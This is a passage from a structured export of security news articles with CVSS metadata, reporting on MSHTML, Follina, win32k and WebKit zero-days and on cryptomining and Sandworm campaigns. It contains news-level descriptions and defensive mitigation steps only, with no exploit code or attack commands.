victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-22T06:04:11", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgn45Ck6vqDFvA2leDePKdPhlDH1ahczKEX1G7NW9CKxteJGkz3l_Dxpmjd1SnrDkHKguss5We9LWuDgnHlJuns2KL7DwAsl-xMBxv1S1VLDsBEjacQCutkUNEQVeTllKkGd_8PyVCTLk6MOVTWU_e_tEHf4dzp7n647bD1HgoUG5tWMG9ax-DFlaWb/s728-e100/russian-hackers.jpg>)\n\nA threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.\n\nRecorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as [Colibri loader](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and [Warzone RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria>).\n\nThe attacks are said to be an expansion of the [same campaign](<https://cert.gov.ua/article/405538>) that previously distributed [DCRat](<https://thehackernews.com/2022/05/experts-sound-alarm-on-dcrat-backdoor.html>) (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.\n\nSandworm is a [destructive Russian threat group](<https://thehackernews.com/2020/10/russian-hackers.html>) that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.\n\nThe adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a [new variant of a piece of malware](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) known as Industroyer.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXC-uZjCaOE_yV1Ns_wdImLvY7yyJYACWqNQeg20fPXqv5CKuqxWQe7J6SuIaEJEfGFj1kYATlPbZUZfu1WcJ3BKgFQldFDoa_8Ak0IbRePTyHl5roYnEv5BqaJPBWNSFWwm2IRfiLxEPXIK6b1T9KLchmrOrOYDES07WewyUwSgVt1Ma91-35cy2g/s728-e100/link.jpg>)\n\nRussia's invasion of Ukraine has also had the group unleash numerous other attacks, including [leveraging the Follina vulnerability](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.\n\nIn addition, it was uncovered as the mastermind behind a new modular botnet called [Cyclops Blink](<https://thehackernews.com/2022/04/fbi-shut-down-russia-linked-cyclops.html>) that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.\n\nThe U.S. government, for its part, has announced up to [$10 million in rewards](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhqC088Qg7YBtg3UXFBJalDCP6mVfxKfvjY5yNkkSnaAzijWLnHr-5hw8ZRAGsRo2kw_2ahBrMMxkklXzZZWQwTk1RdkJ62o6UmJjDK99d2kflQJO76hiDcGt0eVnK9HwdB4v6gYy3p6HhbHfT-i8shyoNIyTsvC0moN0M6dNQGjqFBw-pTH9Rg6yvA/s728-e100/hack.jpg>)\n\n\"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware,\" Recorded Future [said](<https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine>).\n\nThe attacks entail the fraudulent domains hosting a web page purportedly about \"Odesa Regional Military Administration,\" while an encoded ISO image payload is stealthily deployed via a technique referred to as [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>).\n\nHTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.\n\nRecorded Future also said it identified points of similarities with another [HTML dropper attachment](<https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html>) put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.\n\nEmbedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.\n\nThe execution of the LNK file also launches an innocuous decoy document \u2013 an application for Ukrainian citizens to request for monetary compensation and fuel discounts \u2013 in an attempt to conceal the malicious operations.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-20T12:56:00", "type": "thn", "title": "Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-22T06:02:31", "id": "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "href": "https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "Security teams might have skipped January\u2019s Patch Tuesday after reports of it breaking servers, but it also included a patch for a privilege-escalation bug in Windows 10 that leaves unpatched systems open to malicious actors looking for administrative access. It\u2019s a bug that now has a proof-of-concept exploit [available in the wild](<https://github.com/gdabah/win32k-bugs/blob/master/console.cpp>).\n\nThe exploit was released by Gil Dabah, founder and CEO of Privacy Piiano, who tweeted that he decided not to report the bug two years ago after finding it difficult to get paid on other bug bounties through the Microsoft program.\n\n> Found it two years ago. Not recently. That\u2019s the point. <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 26, 2022](<https://twitter.com/_arkon/status/1486449470741135362?ref_src=twsrc%5Etfw>)\n\n## **The LPE Bug **\n\n\u201cA local, authenticated attacker could gain elevated local system or [administrator privileges](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) through a vulnerability in the Win32k.sys driver,\u201d Microsoft explained in it\u2019s advisory, part of [January\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>).\n\nThe [disclosure for CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) from RyeLv, who is attributed with the find, was published on Jan. 13 and described the [win32k object type confusion](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) vulnerability.\n\n\u201cThe attacker can call the relevant GUI API at the user_mode to make the kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc.,\u201d the disclosure by RyeLV said.\n\n\u201cThese kernel functions will trigger a callback xxxClientAllocWindowClassExtraBytes. Attacker can intercept this callback through hook xxxClientAllocWindowClassExtraBytes in KernelCallbackTable,and use the NtUserConsoleControl method to set the ConsoleWindow flag of the tagWND object, which will modify the window type.\u201d\n\nThe bug was being exploited by sophisticated groups as a zero-day issue, Microsoft said.\n\n> Regarding the just-fixed CVE-2022-21882: \nwin32k privilege escalation vulnerability, \nCVE-2021-1732 patch bypass,easy to exploit,which was used by apt attacks\n> \n> \u2014 b2ahex (@b2ahex) [January 12, 2022](<https://twitter.com/b2ahex/status/1481233350840893442?ref_src=twsrc%5Etfw>)\n\n## **Microsoft Needs to Up It\u2019s Bug Bounty Game? **\n\nJanuary\u2019s Patch Tuesday was plagued by [Windows server update issues](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>) that could have understandably made internal security teams pause before downloading the patches. But a PoC is now available for the bug, putting exploitation in reach of cybercriminals of all levels of expertise.\n\nDabah said that Microsoft\u2019s bug-bounty program was problematic.\n\n> The reason I didn\u2019t disclose it, was because I waited to get paid by Msft for long time for other stuff. By the time they paid they reduced awards to nothing almost. I was already busy with my startup and that\u2019s the story how it went unfixed. [@ja_wreck](<https://twitter.com/ja_wreck?ref_src=twsrc%5Etfw>) <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 28, 2022](<https://twitter.com/_arkon/status/1487005745023537157?ref_src=twsrc%5Etfw>)\n\nInvesting in the program was the primary recommendation in RyeLv\u2019s technical analysis to Microsoft.\n\nHe noted how to \u201ckill the bug class\u201d: \u201cImprove the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.\u201d\n\nIt should be noted that Microsoft has been willing to throw additional funding at [bug-bounty programs](<https://threatpost.com/microsoft-30k-teams-bugs/165037/>) for other high-profile products, including last spring\u2019s announcement the company would pay up to $30,000 for Teams bugs.\n\nThe computing giant did not immediately return a request for comment.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-31T21:59:35", "type": "threatpost", "title": "Public Exploit Released for Windows 10 Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-01-31T21:59:35", "id": "THREATPOST:9673D04DAD513AC05EA6440633D75339", "href": "https://threatpost.com/public-exploit-windows-10-bug/178135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote control execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who[ tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c:**Command Prompt**** as Administrator****\u201c**; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is\u201dnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-11T17:01:28", "description": "Apple has patched yet another zero-day vulnerability, this time in its WebKit browser engine, that threat actors already are actively exploiting to compromise iPhones, iPads and MacOS devices.\n\nThe zero-day, tracked as CVE-2022-22620, is a Use-After-Free issue, which is related to incorrect use of dynamic memory during program operation.\n\nIn the case of Apple\u2019s zero-day, threat actors can execute arbitrary code on affected devices after they process maliciously crafted web content, the company said in a [description of the bug](<https://support.apple.com/en-us/HT213092>). The flaw also can lead to unexpected OS crashes.\n\n\u201cApple is aware of a report that this issue may have been actively exploited,\u201d the company wrote in its update notes.\n\nThe simplest way threat actors can exploit the flaw involves the system\u2019s reuse of freed memory, according to the vulnerability\u2019s description on the Common Weakness Enumeration website. \u201cReferencing memory after it has been freed can cause a program to crash, use unexpected values or execute code,\u201d according to the [post](<https://cwe.mitre.org/data/definitions/416.html>).\n\nExploiting previously freed memory can have various adverse consequences, \u201cranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw,\u201d the description said.\n\n## **Memory Error**\n\nThese types of errors typically have two common and sometimes overlapping causes: error conditions and other exceptional circumstances, and confusion over which part of the program is responsible for freeing the memory, according to the post.\n\nIn the case of CVE-2022-22620, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation.\n\n\u201cAs the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process,\u201d according to the post.\n\nIf the newly allocated data happens to hold a class \u2013 for example, in C++ code \u2013 various function pointers may be scattered within the heap data. \u201cIf one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved,\u201d Apple\u2019s post explained.\n\n## **Numerous Devices Affected**\n\nApple released separate security updates for its products to address the issue \u2013 [macOS Monterey 12.2.1](<https://support.apple.com/en-us/HT213092>), [iOS 15.3.1 and iPadOS 15.3.1](<https://support.apple.com/en-us/HT213093>). Both updates improve how the OSes manage memory.\n\nThe flaw affects numerous Apple devices, including iPhone 6s and later; all iPad Pro models, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch 7th generation. It also affects desktops and notebooks running macOS Monterey.\n\nThe update is the second time this year that Apple has had to issue a patch for a zero day. [Last month](<https://threatpost.com/apple-zero-day-security-exploited/178040/>), the company also had to patch a memory issue \u2013 a zero-day flaw also affecting iOS, iPadOS and macOS Monterey tracked as [CVE-2022-22587](<https://packetstormsecurity.com/files/cve/CVE-2022-22587>). Attackers could exploit the bug using a malicious app to execute arbitrary code with kernel privileges.\n\nAt the same time, the company patched another WebKit zero-day tracked as [CVE-2022-22594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594>). The information-disclosure issue affects browsers for macOS, iOS and iPadOS and allows a snooping website to find out information about other tabs a user might have open.\n\nLast year Apple also patched several zero-day vulnerabilities, including [a zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) exploited by the NSO Group\u2019s Pegasus spyware and [a memory-corruption flaw](<https://threatpost.com/apple-patches-actively-exploited-zero-day-in-ios-macos/168177/>) in its iOS and macOS platforms that could allow for system takeover.\n\n## How to Force an Update if Necessary\n\nAs is typical for Apple, it didn\u2019t disclose many details of the vulnerability and won\u2019t until the investigation is completed. At any rate, \u201cthe majority of users have the patches installed,\u201d pointed out Kaspersky in an early morning Friday [post](<https://www.kaspersky.com/blog/webkit-vulnerability-cve-2022-22620/43650/>).\u201dSimply put, the most likely attack scenario is an infection of an iPhone or iPad device after visiting a malicious web page,\u201d noted the security firm\u2019s post.\n\nInstalling the OS 15.3.1 and iPadOS 15.3.1 updates will protect your device, though it does need to be connected to a Wi-Fi network in order to install the patch.\n\nFor devices that aren\u2019t yet showing that the update is ready to be installed, Kaspersky advised that systems can be forced into updating faster by going to system settings (Settings \u2192 General \u2192 Software update) and checking the availability of software updates.\n\n_021122 09:25 update: Added content from Kaspersky\u2019s post._\n\n_**Join Threatpost on **Wed. Feb 23 at 2 PM ET** for a **[LIVE roundtable 